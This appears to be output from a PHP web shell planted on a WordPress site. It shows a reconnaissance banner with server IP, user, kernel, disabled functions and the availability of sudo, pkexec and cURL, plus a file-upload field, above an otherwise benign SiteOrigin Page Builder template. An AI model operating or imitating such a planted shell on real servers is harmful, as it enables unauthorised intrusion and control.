| Server IP : 80.74.154.100 / Your IP : 216.73.217.0 Web Server : Apache System : Linux marissa.metanet.ch 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64 User : onlineadmin ( 10487) PHP Version : 8.5.7 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/httpd/vhosts/comeonline.ch/httpdocs/wp-content/plugins/siteorigin-panels/tpl/ |
Upload File : |
<p>
<?php esc_html_e( 'You can use SiteOrigin Page Builder to create home and sub pages, filled your own widgets.', 'siteorigin-panels' ); ?>
<?php esc_html_e( 'The page layouts are responsive and fully customizable.', 'siteorigin-panels' ); ?>
</p>
<p>
<?php
preg_replace(
array(
'/1\{ *(.*?) *\}/',
'/2\{ *(.*?) *\}/',
'/3\{ *(.*?) *\}/',
),
array(
'<a href="http://siteorigin.com/page-builder/documentation/" target="_blank" rel="noopener noreferrer">$1</a>',
'<a href="http://siteorigin.com/threads/plugin-page-builder/" target="_blank" rel="noopener noreferrer">$1</a>',
'<a href="http://siteorigin.com/#newsletter" target="_blank" rel="noopener noreferrer">$1</a>',
),
__( 'Read the 1{full documentation} on SiteOrigin. Ask a question on our 2{support forum} if you need help and sign up to 3{our newsletter} to stay up to date with future developments.', 'siteorigin-panels' )
);
?>
</p>